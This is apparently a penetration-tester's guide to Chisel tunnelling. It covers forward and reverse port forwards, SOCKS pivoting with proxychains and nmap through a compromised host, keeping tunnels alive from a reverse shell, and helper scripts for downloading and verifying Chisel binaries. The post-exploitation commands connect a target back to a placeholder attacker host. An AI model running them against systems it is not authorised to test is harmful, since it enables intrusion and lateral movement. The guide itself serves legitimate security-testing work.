Port Forwarding with Chisel
Usage
Requires a copy of the Chisel binary on:
- The target host
- The attacker's host
- Download from the Releases Page
Chisel also supports authenticated tunnels to prevent unwanted connections: start the server with --auth user:pass and give the client the same --auth user:pass (chisel also reads it from the AUTH environment variable). Without it, anyone who can reach the chisel server port can open tunnels through it, which matters most for a --reverse server on the attack box.
Example Commands
Individual Port Forwarding
NOTE: If you plan on running the chisel server on the target, ensure the traffic is allowed through any firewalls. In general, running the chisel server on the attack box is a safer bet.
Network Diagram
SCENARIO
--------
Services on TARGET BOX are listening internally on 127.0.0.1 on TCP port 8001 and TCP port 8443
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:8001 on attack box and port forward to 127.0.0.1:8001 on target
Open 127.0.0.1:8443 on attack box and port forward to 127.0.0.1:8443 on target
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
  .---------------.                                                 .---------------.
  |               |                                                 |               |
  |   ATTACK BOX  |         ===============>> (TCP connect)         |   TARGET BOX  |
  |               |                                                 |               |
  | chisel client |==[SSH TUNNEL]==[HTTP WEB SOCKET]==[SSH TUNNEL]==| chisel server |
  |               |                                                 |               |
  '---------------'                                                 '---------------'
                  |                                                 |
 127.0.0.1:8001 --|                                                 |-- 127.0.0.1:8001
 127.0.0.1:8443 --'                                                 '-- 127.0.0.1:8443
Chisel Server on Target
- Chisel server is listening on TCP/51234
- Make sure this port is open in the firewall
- --socks5 is only needed when a client will also request a socks remote; it is harmless for plain port forwards
/tmp/chisel server --socks5 --port 51234
Chisel Client on Attack Box
- Example shows multiple port forwards
- You can specify one or many port forwards
- Add or remove port forward declarations as needed
/tmp/chisel client target-box-ip:51234 127.0.0.1:8001:127.0.0.1:8001 127.0.0.1:8443:127.0.0.1:8443
Example command
.\chisel.exe client target-box-ip:51234 127.0.0.1:8001:127.0.0.1:8001 127.0.0.1:8443:127.0.0.1:8443
                                        ^                             ^
                                        |                             |____ attack-ip:attack-port:target-ip:target-port
                                        |
                                        |__________________________________ attack-ip:attack-port:target-ip:target-port
Syntax explanation
Each remote is local-host:local-port:remote-host:remote-port. In forward mode the chisel client (attack box) listens on local-host:local-port and the chisel server (target box) connects out to remote-host:remote-port. Keep the explicit 127.0.0.1 on the attack side: if local-host is omitted, chisel binds 0.0.0.0 and the forward becomes reachable from any host that can reach the attack box.
Reverse Individual Port Forwarding
- A service on a compromised host is listening on 127.0.0.1
- Run the Chisel server on the attack box in reverse mode and connect from the target
- Specify one or many reverse port forwards on the client
- Open a port on the attack box and forward traffic to the remote port
Network Diagram
SCENARIO
--------
Services on TARGET BOX are listening internally on 127.0.0.1 on TCP port 8001 and TCP port 8443
Run a CHISEL SERVER ON ATTACK BOX and connect to it using a CHISEL CLIENT ON TARGET BOX
Open 127.0.0.1:8001 on attack box and port forward to 127.0.0.1:8001 on target
Open 127.0.0.1:8443 on attack box and port forward to 127.0.0.1:8443 on target
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
  .---------------.                                                 .---------------.
  |               |                                                 |               |
  |   ATTACK BOX  |         <<=============== (TCP connect)         |   TARGET BOX  |
  |               |                                                 |               |
  | chisel server |==[SSH TUNNEL]==[HTTP WEB SOCKET]==[SSH TUNNEL]==| chisel client |
  |               |                                                 |               |
  '---------------'                                                 '---------------'
                  |                                                 |
 127.0.0.1:8001 --|                                                 |-- 127.0.0.1:8001
 127.0.0.1:8443 --'                                                 '-- 127.0.0.1:8443
Chisel Server on Attack Box
./chisel server --reverse --port 51234
Chisel Client on Target
- Example command shows multiple port forwards
- You can specify one or many port forwards
- Add or remove port forward declarations as needed
/tmp/chisel client attack-box-ip:51234 R:8001:127.0.0.1:8001 R:8443:127.0.0.1:8443
Example command
.\chisel.exe client attack-box-ip:51234 R:8001:127.0.0.1:8001 R:8443:127.0.0.1:8443
                                        ^                     ^
                                        |                     |___ R:attack-port:target-ip:target-port
                                        |
                                        |___ R:attack-port:target-ip:target-port
# "R:" marks a reverse remote: the listener is opened on the chisel server (the attack box)
# With no attack-ip given, chisel binds 0.0.0.0:8001 and 0.0.0.0:8443 on the attack box, not 127.0.0.1
# Use R:127.0.0.1:8001:127.0.0.1:8001 if the forward should only be reachable from the attack box itself
Syntax explanation
Forward Dynamic SOCKS Proxy
- Run the Chisel server on the target box
- Use the target box as a jump host to reach additional targets routable by the target
- The traffic flows forward to the target box, which acts as a transparent SOCKS proxy
SOCKS operates at layer 4 and up on the OSI model. Ping -- or ICMP -- is a layer 3 protocol and does not flow over SOCKS. So, you cannot ping targets through a SOCKS proxy; tell nmap to skip host discovery with -Pn.
Network Diagram
SCENARIO
--------
You have landed on a target that has access to ADDITIONAL TARGET(s) and/or ADDITIONAL ROUTE(s)
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:50080 on attack box and use this TCP connection as a SOCKS5 proxy
All traffic flowing through the SOCKS5 proxy will be routed by TARGET BOX to any specified destination
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
  .---------------.                                                 .---------------.
  |               |                                                 |               |                  .----.  .----.
  |   ATTACK BOX  |         ===============>> (TCP connect)         |   TARGET BOX  |                  |    |  |    |
  |               |                                                 |               |                  '----'  '----'
  | chisel client |==[SSH TUNNEL]==[HTTP WEB SOCKET]==[SSH TUNNEL]==| chisel server |--SOCKS5 PROXY--> .----.  .----.
  |               |                                                 |               |                  |    |  |    |
  '---------------'                                                 '---------------'                  '----'  '----'
                  |                                                 |                  ADDITIONAL TARGETS OR NETWORKS
 127.0.0.1:50080 -'                                                 '-- 127.0.0.1:8080 (a service on target loopback, reached through the proxy)
"socks5 127.0.0.1 50080" in proxychains4.conf
proxychains -q nmap -Pn -sT --top-ports 500 <target(s)>
curl --proxy "socks5://127.0.0.1:50080" http://127.0.0.1:8080
Chisel Server on Target
- Chisel server is listening on TCP port 51234
- Make sure this port is open in the firewall
.\chisel.exe server --socks5 --port 51234
Chisel Client on Attack Box
/tmp/chisel client target-box-ip:51234 50080:socks
Example command: Open TCP/50080 as the SOCKS5 proxy port on attack box
/tmp/chisel client target-box-ip:51234 50080:socks
                                       ^
                                       |____ attack-port:socks
# With no attack-ip given, chisel binds the SOCKS listener on 0.0.0.0:50080 on the attack box
# Use 127.0.0.1:50080:socks to keep the proxy on loopback
Syntax explanation
Reverse Dynamic SOCKS Proxy
- Run the Chisel server on the attack box in reverse mode
- Connect to the Chisel server from the target and specify a reverse port forward
- The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy
SOCKS operates at layer 4 and up on the OSI model. Ping -- or ICMP -- is a layer 3 protocol and does not flow over SOCKS. So, you cannot ping targets through a SOCKS proxy; tell nmap to skip host discovery with -Pn.
Network Diagram
SCENARIO
--------
You have landed on a target that has access to ADDITIONAL TARGET(s) and/or ADDITIONAL ROUTE(s)
Run a CHISEL SERVER ON ATTACK BOX and connect to it using a CHISEL CLIENT ON TARGET BOX
Open 127.0.0.1:50080 on attack box and use this TCP connection as a SOCKS5 proxy
All traffic flowing through the SOCKS5 proxy will be routed by TARGET BOX to any specified destination
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
  .---------------.                                                 .---------------.
  |               |                                                 |               |                  .----.  .----.
  |   ATTACK BOX  |         <<=============== (TCP connect)         |   TARGET BOX  |                  |    |  |    |
  |               |                                                 |               |                  '----'  '----'
  | chisel server |==[SSH TUNNEL]==[HTTP WEB SOCKET]==[SSH TUNNEL]==| chisel client |--SOCKS5 PROXY--> .----.  .----.
  |               |                                                 |               |                  |    |  |    |
  '---------------'                                                 '---------------'                  '----'  '----'
                  |                                                 |                  ADDITIONAL TARGETS OR NETWORKS
 127.0.0.1:50080 -'                                                 '-- 127.0.0.1:8080 (a service on target loopback, reached through the proxy)
"socks5 127.0.0.1 50080" in proxychains4.conf
proxychains -q nmap -Pn -sT --top-ports 500 <target(s)>
curl --proxy "socks5://127.0.0.1:50080" http://127.0.0.1:8080
Chisel Server on Attack Box
/tmp/chisel server --reverse --port 51234
Chisel Client on Target
.\chisel.exe client attack-box-ip:51234 R:50080:socks
Example command: Open TCP/50080 as the SOCKS5 proxy port on attack box
.\chisel.exe client attack-box-ip:51234 R:50080:socks
                                        ^
                                        |___ R:attack-port:socks
"R:" marks a reverse remote: the SOCKS listener is opened on the chisel server (the attack box)
With no attack-ip given, chisel binds 0.0.0.0:50080 on the attack box, not 127.0.0.1
Use R:127.0.0.1:50080:socks to keep the proxy on loopback
Syntax explanation
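The remote syntax used by all four sections above (Individual, Reverse Individual, Forward Dynamic SOCKS and Reverse Dynamic SOCKS) is chisel's documented local-host:local-port:remote-host:remote-port with an optional R: prefix, and the detail that bites in practice is the default local host. The helper below is an added example, not code from the original page or from the chisel project: it decodes a remote spec the way chisel's documented defaults say it will be interpreted and flags any spec that would bind 0.0.0.0. The parsing is modelled on the README grammar only (bracketed IPv6 hosts, /udp and stdio remotes are not handled), so treat it as an approximation rather than chisel's own parser.

```shell
# Added example, not from the original page or from chisel itself: decode a
# chisel remote spec using the defaults chisel documents (omitted local-host
# -> 0.0.0.0, omitted remote-host -> 0.0.0.0, socks port -> 1080) and report
# where the listener will be opened. Assumption: modelled on the README
# grammar; [ipv6] hosts, /udp and stdio forms are not handled.
decode_remote() {
  local spec=$1 rest part first=yes reverse=no socks=no
  local lhost= lport= rhost= rport= dest mode listener
  case $spec in R:*) reverse=yes; spec=${spec#R:} ;; esac
  rest=$spec
  # Walk the colon-separated parts from right to left: the remote side is
  # filled first and whatever is left describes the local listener.
  while [ -n "$rest" ]; do
    part=${rest##*:}
    if [ "$rest" = "$part" ]; then rest=; else rest=${rest%:*}; fi
    if [ "$first" = yes ] && [ "$part" = socks ]; then
      socks=yes; first=no; continue
    fi
    first=no
    case $part in
      ''|*[!0-9]*)                        # a host name or address
        if [ "$socks" = no ] && [ -z "$rhost" ]; then rhost=$part; else lhost=$part; fi ;;
      *)                                  # a port number
        if [ "$socks" = no ] && [ -z "$rport" ]; then rport=$part; fi
        lport=$part ;;
    esac
  done
  if [ "$socks" = no ] && [ -z "$rport" ]; then
    echo "decode_remote: remote port is required in '$1'" >&2
    return 1
  fi
  # Defaults: an omitted local host means every interface, not loopback.
  [ -n "$lhost" ] || lhost=0.0.0.0
  if [ "$socks" = yes ]; then
    [ -n "$lport" ] || lport=1080
    dest=socks
  else
    [ -n "$rhost" ] || rhost=0.0.0.0
    dest="$rhost:$rport"
  fi
  # Forward remotes listen on the chisel client; R: remotes listen on the server.
  if [ "$reverse" = yes ]; then mode=reverse; listener=server; else mode=forward; listener=client; fi
  printf 'mode=%s listener=%s bind=%s:%s dest=%s\n' "$mode" "$listener" "$lhost" "$lport" "$dest"
}

# Exit 0 when the spec would open its listener on a wildcard address.
remote_is_exposed() {
  case $(decode_remote "$1") in
    *' bind=0.0.0.0:'*) return 0 ;;
    *) return 1 ;;
  esac
}

# e.g. decode_remote R:8001:127.0.0.1:8001
#      -> mode=reverse listener=server bind=0.0.0.0:8001 dest=127.0.0.1:8001
```

Run it over every remote before pasting a command into a shell on the target; the forms this page uses without an explicit attack-ip (R:8001:127.0.0.1:8001, 50080:socks, R:50080:socks) all come back as bind=0.0.0.0, which is exactly what you do not want on an attack box sitting on a shared network.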
Proxychains
proxychains is used for dynamic port scanning when using Forward or Reverse Dynamic SOCKS Proxy
sudo nano /etc/proxychains4.conf
The example below assumes you've used tcp/50080 as the SOCKS5 proxy port (as shown in the example command above). We must specify socks5 in the [ProxyList] section, as this is the protocol spoken by Chisel's built-in proxy.
[ProxyList]
socks5 127.0.0.1 50080
Port Scanning via SOCKS Proxy
With SOCKS, you must use the -sT flag to make a full TCP connection through the proxy. A SOCKS proxy only relays complete TCP connections, so -sS (SYN, half-open) scans and other raw-packet scans never enter the tunnel, and neither does ICMP host discovery, which is why -Pn is needed as well.
Scanning 127.0.0.1 -- in this case -- causes the traffic to flow through the SOCKS session, come out the other side of the proxy on the target and effectively scan the loopback adapter on the target side.
# TCP connect scans are brutally slow, use top 1,000 ports
sudo proxychains -q nmap -Pn -sT --top-ports 1000 -T4 -sC -sV 127.0.0.1
Reverse Shell Tips
Run Chisel in the Background
Running chisel in the foreground of a reverse shell will render your shell useless; these notes are a way to work around this.
Linux
Client Mode
chisel client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80 > /dev/null 2>&1 &
Background a process with &. The redirect keeps chisel's log lines out of the reverse shell; prefix the command with nohup if the session may drop and the tunnel has to survive it.
Server Mode
chisel server --port 8080 --reverse > /dev/null 2>&1 &
Background a process with &
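The one-liners above work, but "&" on its own leaves the process tied to the reverse shell's stdio and, in many shells, to its SIGHUP. The helpers below are an added example rather than code from the original page: they start a command fully detached, record its PID and let you check on or stop it later. The pid-file path and chisel arguments in the usage comment are placeholders.

```shell
# Added example (not from the original page): start chisel, or any long-running
# command, detached from a reverse shell, record its PID, and check on it later.
# Plain "&" leaves stdout/stderr attached to the shell and a dropped session can
# still SIGHUP the child; ignoring HUP and redirecting all stdio handles both
# (equivalent to nohup, without depending on the nohup binary being present).
start_detached() {
  local pidfile=$1; shift                 # $1 = pid file, rest = command line
  ( trap '' HUP; exec "$@" </dev/null >/dev/null 2>&1 ) &
  local pid=$!
  disown "$pid" 2>/dev/null || true       # bash: drop it from the job table
  printf '%s\n' "$pid" >"$pidfile"
  printf '%s\n' "$pid"
}

# Exit 0 if the PID recorded in the pid file is still alive.
is_detached_running() {
  local pid
  pid=$(cat "$1" 2>/dev/null) || return 1
  [ -n "$pid" ] && kill -0 "$pid" 2>/dev/null
}

# Stop the detached process and remove its pid file.
stop_detached() {
  local pid
  pid=$(cat "$1" 2>/dev/null) || return 1
  kill "$pid" 2>/dev/null
  rm -f "$1"
}

# Typical use from a reverse shell on the target (paths and addresses are placeholders):
#   start_detached /tmp/chisel.pid /tmp/chisel client attack-box-ip:51234 R:127.0.0.1:8001:127.0.0.1:8001
#   is_detached_running /tmp/chisel.pid && echo "tunnel up"
#   stop_detached /tmp/chisel.pid
```

Because chisel's output is discarded, confirm the tunnel from the attack side (the chisel server logs each connecting client, or simply test the forwarded port) rather than from the target.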
Windows
PowerShell
Client Mode
$scriptBlock = { C:\Windows\Temp\chisel.exe client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80 }
Start-Job -ScriptBlock $scriptBlock
Store a PowerShell scriptblock in the $scriptBlock variable and run it in the background with Start-Job. The job runs in a child process of the current PowerShell host and ends when that host exits, so if the reverse shell dies the tunnel dies with it. Check on it with Get-Job and read chisel's output with Receive-Job.
Server Mode
Note that in server mode, you'll need to make sure your port is allowed through the firewall.
$scriptBlock = { C:\Windows\Temp\chisel.exe server --port 50001 --socks5 }
Start-Job -ScriptBlock $scriptBlock
Store a PowerShell scriptblock in the $scriptBlock variable and run it in the background with Start-Job.
Bash Function to Download Chisel Binaries
I've added this function to my ~/.zshrc file so that I can just invoke the function at any time to download the Linux and Windows chisel binaries.
function download_chisel() {
  # Variables
  local download_base_url='https://github.com/jpillora/chisel/releases/download'
  local latest_release_api='https://api.github.com/repos/jpillora/chisel/releases/latest'
  local linux_output_name='chisel.gz'
  local linux32_output_name='chisel32.gz'
  local windows_output_name='chisel.exe.gz'
  local windows32_output_name='chisel32.exe.gz'
  # Resolve the latest tag (e.g. v1.10.1) from the releases API; a grep/cut
  # pipeline over the HTML tags page breaks whenever GitHub changes its markup
  local url_version
  url_version=$(curl -sfL "$latest_release_api" | grep -o '"tag_name": *"[^"]*"' | head -n 1 | cut -d '"' -f 4)
  if [[ -z "$url_version" ]]; then
    echo "download_chisel: could not resolve the latest chisel release tag" >&2
    return 1
  fi
  local binary_version="${url_version#v}"
  local linux_binary_name="chisel_${binary_version}_linux_amd64.gz"
  local linux32_binary_name="chisel_${binary_version}_linux_386.gz"
  local windows_binary_name="chisel_${binary_version}_windows_amd64.gz"
  local windows32_binary_name="chisel_${binary_version}_windows_386.gz"
  local linux_download_url="${download_base_url}/${url_version}/${linux_binary_name}"
  local linux32_download_url="${download_base_url}/${url_version}/${linux32_binary_name}"
  local windows_download_url="${download_base_url}/${url_version}/${windows_binary_name}"
  local windows32_download_url="${download_base_url}/${url_version}/${windows32_binary_name}"
  # Download, extract, set mode
  # -f makes curl fail on HTTP errors instead of saving GitHub's 404 page as a .gz
  curl -sfL "$linux_download_url" -o "$PWD/${linux_output_name}" || return 1
  curl -sfL "$linux32_download_url" -o "$PWD/${linux32_output_name}" || return 1
  curl -sfL "$windows_download_url" -o "$PWD/${windows_output_name}" || return 1
  curl -sfL "$windows32_download_url" -o "$PWD/${windows32_output_name}" || return 1
  # gunzip -f overwrites leftovers from a previous run instead of prompting
  gunzip -f "$linux_output_name"
  gunzip -f "$linux32_output_name"
  gunzip -f "$windows_output_name"
  gunzip -f "$windows32_output_name"
  # both Linux binaries need the execute bit, not only the amd64 one
  chmod u+x ./chisel ./chisel32
  echo "Linux and Windows chisel binaries (${url_version}) downloaded and unarchived in $PWD"
}
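Anything pulled straight off a release page and then dropped onto a target deserves a checksum check first. Chisel's GitHub releases ship a SHA-256 checksum list next to the archives (the usual goreleaser layout); the function below, an added example rather than the page's own code, verifies downloaded archives against such a list before you gunzip and run them. It assumes the list is in sha256sum's "<hex>  <name>" format and that it is named chisel_<version>_checksums.txt (confirm the exact name on the release page), and it matches files by their upstream names, so run it on the archives before they are renamed to chisel.gz and friends.

```shell
# Added example (not from the original page): verify downloaded chisel release
# archives against the release's SHA-256 checksum list before unpacking or
# running them. Assumptions: the list uses sha256sum's "<hex>  <name>" format
# (goreleaser-style) and is named chisel_<version>_checksums.txt; confirm the
# name on the release page.
verify_release_files() {
  local sums=$1; shift                     # $1 = checksums file, rest = files to check
  local f name expected actual status=0
  [ -r "$sums" ] || { echo "checksums file not readable: $sums" >&2; return 1; }
  for f in "$@"; do
    name=${f##*/}                          # list entries carry bare file names
    # accept "name", "./name" and sha256sum's binary-mode "*name" forms
    expected=$(awk -v n="$name" '$2 == n || $2 == "./" n || $2 == "*" n { print $1; exit }' "$sums")
    if [ -z "$expected" ]; then
      echo "MISSING  $name (not in checksum list)"; status=1; continue
    fi
    actual=$(sha256sum "$f" | cut -d ' ' -f 1)
    if [ "$actual" = "$expected" ]; then
      echo "OK       $name"
    else
      echo "MISMATCH $name"; status=1
    fi
  done
  return $status                           # non-zero if any file is missing or altered
}

# Usage, with the release's checksum list fetched alongside the archives
# (version and file names are placeholders):
#   verify_release_files chisel_1.10.1_checksums.txt chisel_1.10.1_linux_amd64.gz chisel_1.10.1_windows_amd64.gz \
#     && gunzip chisel_1.10.1_linux_amd64.gz
```

A checksum list served from the same release page only protects against a corrupted or partial download, not against a compromised upstream; it is still worth doing, because a truncated .gz from a failed download is the more common failure and it will only show up later as a binary that will not run on the target.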